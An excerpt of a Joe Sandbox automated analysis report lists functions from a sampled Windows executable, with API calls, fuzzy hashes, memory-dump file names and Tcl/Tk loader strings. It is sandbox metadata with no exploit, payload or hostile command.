Instruction Fuzzy Hash: 4EE08C12F2930382FF1AAFB6988943C19A15F88709F406E34CE1DCB296FE3DB8854650

Function 00007FF67D017F24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF67D017F28
GetLastError.KERNEL32 ref: 00007FF67D017F32

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
Instruction ID: 240208a888c02533800f3a0e161d2b9aa2b11b836814eb2ddf1aacbd268973dd
Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
Instruction Fuzzy Hash: 65D0C912E3E603C2E6546F76188903E15A02F88768F502F74C02EC01D0FE2DB4890151

Function 00007FF67D0187A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF67D0187AC
GetLastError.KERNEL32 ref: 00007FF67D0187B6

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction ID: f07b31fb7da3ba2e37a0fe977fc45103de99ffc60571136d8a015666585d6f1a
Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction Fuzzy Hash: FAD0C912E3A60391E6547F76188503D15A02F58B69F502F30C02DC21D0FE2DF1491112

Function 00007FF67D007D50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

_findclose.LIBCMT ref: 00007FF67D007FA9

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
Instruction ID: fbbcc1223eeb3bc90a6dd7b5890baf4c4853fa978ebbd2fb33d75da0caa394b4
Opcode Fuzzy Hash: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
Instruction Fuzzy Hash: 65716953E28AC581EA11CF2CD5092FD6360F7A8B88F54E721DB8C52592FF28E2D9C740

Function 00007FF67D01C56C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01C594

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
Instruction ID: 28b7735eb13ca89a376c48b33de6ee6ab7a26326c2419c91bd6984df3da6c1f0
Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
Instruction Fuzzy Hash: D641F373A2824183EA24DE19E55027DB3A0EB55748F102B35D68EC3691EF3EF442C750

Function 00007FF67D0082C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF67D00836A

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 261b6aa2baab1fe210e6955bbdd347d680c16595553269c070d03284900824a2
Instruction ID: a0a6f632e5c88516a57602cc71a0a3fd140c88d7fb333657696d1f8ab73fb608
Opcode Fuzzy Hash: 261b6aa2baab1fe210e6955bbdd347d680c16595553269c070d03284900824a2
Instruction Fuzzy Hash: 3221E423B3825255FA14EE1268143BEA655FF85BD8F882930EE4C87786EE7DF001C304

Function 00007FF67D01BFFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01C082

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
Instruction ID: 1d930ed908da908fce10e695d7b70ce5c270fa5780b0aa5e917e44da28ca2d9e
Opcode Fuzzy Hash: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
Instruction Fuzzy Hash: 5F31D523E3875285F752AF55884137C6A60AF44B98F412B35EA1C8B3D2EF7EF4418715

Function 00007FF67D019FF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF67D01A01F

Part of subcall function 00007FF67D01A118: GetModuleHandleExW.KERNEL32 ref: 00007FF67D01A13D
Part of subcall function 00007FF67D01A118: GetProcAddress.KERNEL32 ref: 00007FF67D01A153
Part of subcall function 00007FF67D01A118: FreeLibrary.KERNEL32 ref: 00007FF67D01A17A

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction ID: 84b3987ac3f6981dc05769d50270ee7411c105a90107924b5fa459a215c3ac47
Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction Fuzzy Hash: 4C217F32A247468AEB268F64C4402EC37A0EB0471CF441B35D61D87AC5FF39E565CB50

Function 00007FF67D0165A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01650D

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: ba086c90d1125e702537f469ca82e761f4524a0b18815c85a87c1cbc8bf8d54a
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: 9B117B67A2C74181EF50DF51981127DA764BF85B88F845E31EA4D9768AEF7EF4408700

Function 00007FF67D026DAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D026DCF

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
Instruction ID: 67a1e4042f076e70061b751c98d47134e35fefce944b31d2d9192db0c359379a
Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
Instruction Fuzzy Hash: 7021BE33A29A8187DB61CF18E44076976A0EB84B68F645734EA5D876D9EF3DF8008B00

Function 00007FF67D0105FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D010650

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: 9e81972da620e93cf06c24240699a13e6a951021f9021bdf6eacebbba11872ba
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: 8F01C462A2874141EA04DF56990106DB6A5BF85FE8F185B34DEACA7BD6EE3EF0018700

Function 00007FF67D017BB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D017BEE

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
Instruction ID: 34da477f968d67adb1d544e8e995f0c280e37c1aed1eec64640b827dff9c40a1
Opcode Fuzzy Hash: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
Instruction Fuzzy Hash: 31018022E2D642C0FA646F61A94927D6190AF8479CF146F38EA9DD26C7FF3EFC414200

Function 00007FF67D01F258 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF67D01BAA6,?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02), ref: 00007FF67D01F2AD

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction ID: df0ac6a1e171e5de8069a61c8b8ee49f12452666d78c213083f694a1749f3fc6
Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction Fuzzy Hash: 02F06D2BB2960645FE549FA194113BD2A915F89B88F4C6E30CE0EC63D1FE2EF4818620

Function 00007FF67D01DCBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF67D010E24,?,?,?,00007FF67D012336,?,?,?,?,?,00007FF67D013929), ref: 00007FF67D01DCFA

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction ID: a29d7345a80eb8eb3c419fd772a605ff7889b461c895951308bf8e825645c5ae
Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction Fuzzy Hash: DDF05E02F2924751FE549EA1980067912905F887A8F0C2F30E82ECA2C1FE2EF4408620

Function 00007FF67D017EEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D017F05

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction ID: 34fcb5fb3c1e7a08e103629ac7e154e19daf02d537a2ef4c78a6b2914f642605
Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction Fuzzy Hash: C7E08C62E28302C2FB147EA2098A6BD21114F84308F402E38DA488A2C3FE1EBC458620

Function 00007FF67D0083F0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction ID: fcebc1a8c47299016a46725df138c907698c22368085fabd81058aac84609ad5
Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction Fuzzy Hash: 2E414217D3CA8591EA51AF2495112FD6360FBA9784F54AB32DB8D82293FF28B5D88300

Non-executed Functions

Function 00007FF67D006F00 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF67D006F17
GetProcAddress.KERNEL32 ref: 00007FF67D006F56
GetProcAddress.KERNEL32 ref: 00007FF67D006F7B
GetProcAddress.KERNEL32 ref: 00007FF67D006FA0
GetProcAddress.KERNEL32 ref: 00007FF67D006FC8
GetProcAddress.KERNEL32 ref: 00007FF67D006FF0
GetProcAddress.KERNEL32 ref: 00007FF67D007018
GetProcAddress.KERNEL32 ref: 00007FF67D007040
GetProcAddress.KERNEL32 ref: 00007FF67D007068

Strings

Failed to get address for Tcl_Init, xrefs: 00007FF67D006F29
Tcl_GetObjResult, xrefs: 00007FF67D0072B6
Tcl_ThreadQueueEvent, xrefs: 00007FF67D00714E
Tcl_MutexUnlock, xrefs: 00007FF67D0070AE
Tcl_ConditionWait, xrefs: 00007FF67D007126
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF67D006FB2
Tcl_FinalizeThread, xrefs: 00007FF67D006FE6
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF67D00720A
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF67D0070CA
Tcl_DoOneEvent, xrefs: 00007FF67D006F96
Tk_Init, xrefs: 00007FF67D0073A6
Failed to get address for Tcl_Alloc, xrefs: 00007FF67D007372
Tcl_SetVar2, xrefs: 00007FF67D0071C6
Failed to get address for Tcl_Free, xrefs: 00007FF67D00739A
Tcl_Finalize, xrefs: 00007FF67D006FBE
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF67D007282
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF67D0072D2
Tcl_EvalFile, xrefs: 00007FF67D0072DE
Tcl_GetVar2, xrefs: 00007FF67D00719E
Failed to get address for Tk_Init, xrefs: 00007FF67D0073C2
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF67D0070F2
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF67D007002
Tcl_NewStringObj, xrefs: 00007FF67D00723E
Failed to get address for Tcl_GetString, xrefs: 00007FF67D007232
Tcl_DeleteInterp, xrefs: 00007FF67D00700E
Failed to get address for Tcl_EvalFile, xrefs: 00007FF67D0072FA
Tcl_ConditionNotify, xrefs: 00007FF67D0070FE
Tcl_CreateInterp, xrefs: 00007FF67D006F4C
GetProcAddress, xrefs: 00007FF67D006F30
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF67D006F68
Tcl_Free, xrefs: 00007FF67D00737E
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF67D00707A
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF67D007192
Tcl_FindExecutable, xrefs: 00007FF67D006F71
Tcl_ConditionFinalize, xrefs: 00007FF67D0070D6
Tcl_EvalEx, xrefs: 00007FF67D007306
Tcl_EvalObjv, xrefs: 00007FF67D00732E
Failed to get address for Tcl_SetVar2, xrefs: 00007FF67D0071E2
Tcl_NewByteArrayObj, xrefs: 00007FF67D007266
Tcl_SetVar2Ex, xrefs: 00007FF67D00728E
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF67D0072AA
Failed to get address for Tcl_CreateThread, xrefs: 00007FF67D007052
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF67D00734A
Failed to get address for Tcl_GetVar2, xrefs: 00007FF67D0071BA
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF67D007142
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF67D006F8D
Tcl_MutexLock, xrefs: 00007FF67D007086
Tcl_GetCurrentThread, xrefs: 00007FF67D00705E
Failed to get address for Tcl_MutexLock, xrefs: 00007FF67D0070A2
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF67D00725A
Tcl_GetString, xrefs: 00007FF67D007216
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF67D00702A
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF67D00716A
Tcl_CreateThread, xrefs: 00007FF67D007036
Tk_GetNumMainWindows, xrefs: 00007FF67D0073CE
Failed to get address for Tcl_EvalEx, xrefs: 00007FF67D007322
Tcl_Init, xrefs: 00007FF67D006F10
Failed to get address for Tcl_Finalize, xrefs: 00007FF67D006FDA
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF67D00711A
Tcl_ThreadAlert, xrefs: 00007FF67D007176
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF67D0073EA
Tcl_Alloc, xrefs: 00007FF67D007356
Tcl_CreateObjCommand, xrefs: 00007FF67D0071EE

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for 